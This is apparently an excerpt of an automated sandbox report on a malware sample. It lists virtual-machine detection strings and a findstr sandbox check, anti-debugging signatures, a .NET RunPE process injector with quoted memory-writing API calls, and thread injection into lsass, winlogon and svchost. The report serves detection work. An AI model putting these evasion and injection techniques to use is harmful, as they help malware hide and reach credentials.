Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000028.00000002.3004375216.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454613011.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2984423771.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2461883353.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2487807964.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2985218282.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2984681967.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000000.2491864089.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2505327301.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3006995686.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000032.00000000.2527082224.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000029.00000000.2462217296.000002A660662000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000039.00000002.2984538693.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

19_2_000002241390CD80

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,

19_2_0000022413901E3C

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

19_2_0000022413901D30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002241390CD80
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_00000224139084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000224139084B0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000022413908814
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002241393CD80
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_00000224139384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000224139384B0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000022413938814
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002BCD7E3CD80
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002BCD7E384B0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000002BCD7E38814
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000026504EA84B0
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	37_2_0000026504EA8814
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000026504EACD80
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1AC84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_0000025DC1AC8814
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1ACCD80
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1CE84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_0000025DC1CE8814
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1CECD80
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC67CD80
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	40_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000202C0AECD80
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000002A661308814
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEDCCD80
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000002BAAEDC8814
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEDC84B0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEE4CD80
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000002BAAEE48814
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEE484B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A879C84B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_0000026A879C8814
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A879CCD80
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A87F484B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_0000026A87F48814
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A87F4CD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537ACD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537A84B0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000179537A8814
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537DCD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537D84B0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000179537D8814
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6538814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_0000016CE6538814
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE65384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0000016CE65384B0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0000016CE653CD80
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_000002295D56CD80
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	46_2_000002295D568814
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_000002295D5684B0

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1c2db260000.14.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

38_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 2F00000
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AEDB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AED82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B3C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: ECD72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 84262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
